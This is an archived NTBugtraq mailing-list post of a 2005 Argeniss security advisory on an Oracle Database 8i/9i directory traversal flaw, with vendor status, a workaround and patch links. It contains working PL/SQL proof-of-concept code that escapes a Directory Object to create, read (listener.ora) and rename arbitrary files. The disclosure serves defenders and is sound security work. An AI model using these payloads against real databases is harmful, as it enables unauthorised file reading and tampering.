Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security NTBugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

- Argeniss - Oracle Database Server Directory transversal

from [Cesar] Network Security [Permanent Link]
Subject: - Argeniss - Oracle Database Server Directory transversal
Date: Mon, 7 Mar 2005 15:21:25 -0800 
Argeniss Security Advisory


Name: Oracle Database Server Directory transversal
Affected Software: Oracle Database Server versions 8i
and 9i
Severity :  Medium
Remote exploitable: Yes (Authentication to Database
Server is needed)
Credits:    Cesar Cerrudo
Date:    03/07/05
Advisory Number:   ARG030501


Details:

Oracle Database Server provides many packages
functions to access the OS file system, some of these
functions are not able to access files directly, for
example in order to access files a Directory Object
must be created and grant to users permissions on the
object, this object references a directory in the
file system and it can be used by functions to access
files under that directory only. However functions
don't properly validate the input and by supplying a
especially constructed string the directory can be
escaped and the parent directories can be accessed,
because of this any file in the same drive
as the directory, can be read, renamed, overwrited,
etc.


To reproduce the vulnerability execute the next
PL/SQL:
(In older Oracle database server versions the same
could work just using "\..\..\")
(This is not a extensive list of vulnerable functions,
other functions that parse files could
also be vulnerable)

--this create a file called Unbreakable.txt in the
same drive as the directory referenced by
--MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

--this example can be used to read arbitrary files in
the same drive as the directory referenced by
--MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
  UTL_FILE.GET_LINE (f,sBuffer);
  DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--this rename any file in the same drive as the
directory referenced by
--MEDIA_DIR directory object
begin

UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;


By default UTL_FILE package has execute permission to
public role so any Oracle database
user with permissions on a Directory Object can
exploit this vulnerability.
Explotation of this vulnerability allow an attacker to
overwrite, read, rename, etc.
arbitrary files.


Vendor Status:

Oracle was contacted on October 2003, after an initial
email interchange i didn't have any
news about when the vulnerability was going to be
patched or when it was patched nor i was credited,
but this is common when dealing with Oracle on
security issues.


Workaround:

Restrict access to Directory Objects and UTL_FILE
package.



Patch Available:

http://metalink.oracle.com


Links:

http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.petefinnigan.com/directory_traversal.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf



Important!!!!!!!!

There are still hundreds of unpatched Oracle Database
Server vulnerabilities affecting
versions 8i, 9i and 10g some of them have been
reported more than 1 year ago.
If you want to know more about these vulnerabilities
and many others check out our
AVI (Advanced Vulnerability Information) service at
http://www.argeniss.com/services.html




-----------------------------------
--Argeniss - Information Security--
-----http://www.argeniss.com-------
------info>at<argeniss.com---------
-----------------------------------



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

--
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an 
Anti-Virus product which automatically notifies the perceived sender of a 
message it believes is infected may well cause more harm than good. Someone who 
did not actually send you a virus may receive the notification and scramble 
their support staff to find an infection which never existed in the first 
place. Suggest such notifications be disabled by whomever is responsible for 
your AV, or at least that the idea is considered.
--
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • - Argeniss - Oracle Database Server Directory transversal, Cesar <=
Previous by Date:  Administrivia #28886 - Securing your Partners survey - 2nd Request, Russ
Next by Date:  LAND attack vulnerability on Windows Server 2003 and Windows XP, James Rankin
Previous by Thread:  Administrivia #28886 - Securing your Partners survey - 2nd Request, Russ
Next by Thread:  LAND attack vulnerability on Windows Server 2003 and Windows XP, James Rankin
Indexes:  [Date] [Thread] [Top] [All Lists]